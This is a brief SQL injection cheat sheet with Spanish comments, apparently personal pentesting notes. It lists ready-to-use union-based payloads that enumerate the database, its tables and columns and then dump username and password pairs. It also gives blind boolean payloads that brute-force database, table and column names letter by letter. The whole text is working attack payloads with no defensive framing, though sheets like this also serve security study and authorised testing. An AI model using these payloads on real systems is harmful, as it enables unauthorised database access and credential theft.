💾SQLi

Manual dump

In-Band Union-based

0 UNION SELECT 1,2,3 # buscando numero de columnas
0 UNION SELECT 1,2,database()
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = <'database-name'>
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = <'table-name'>
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM <'table-name'>

Blind Boolean

admin123' UNION SELECT 1;--   #'# buscando numero de columnas
admin123' UNION SELECT 1,2,3;--
admin123' UNION SELECT 1,2,3 where database() like 's%';-- # bruteforce nombre db
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = <'db-name'> and table_name like 'a%';-- # bruteforce nombre tabla
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = <'db-name'> and table_name=<'tabla-name'>;-- # check tabla
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA=<'db-name'> and TABLE_NAME=<'tabla-name'> and COLUMN_NAME like 'a%'; # bruteforce columna

Última actualización hace 3 horas